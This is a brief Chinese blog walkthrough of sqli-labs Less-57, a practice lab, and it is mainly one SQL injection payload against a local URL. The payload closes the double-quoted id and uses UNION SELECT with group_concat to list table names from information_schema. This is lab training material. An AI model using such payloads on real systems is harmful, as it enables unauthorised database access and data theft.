Less-57

Sqli-labs less 57

 

 

 

 

从代码中看到对id进行了 " " 的处理,所以此处我们构造的payload要进行 "" 的处理,示例payload:

http://127.0.0.1/sqli-labs/Less-57/index.php?id=-1"union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'%23

Sqli-labs less 57

 

相关文章:

  • 2021-10-26
  • 2021-10-31
  • 2021-04-23
  • 2021-12-16
  • 2021-09-14
  • 2021-10-28
  • 2021-09-24
  • 2021-06-02
猜你喜欢
  • 2021-12-23
  • 2021-07-25
  • 2021-07-23
  • 2021-07-17
  • 2021-08-31
相关资源
相似解决方案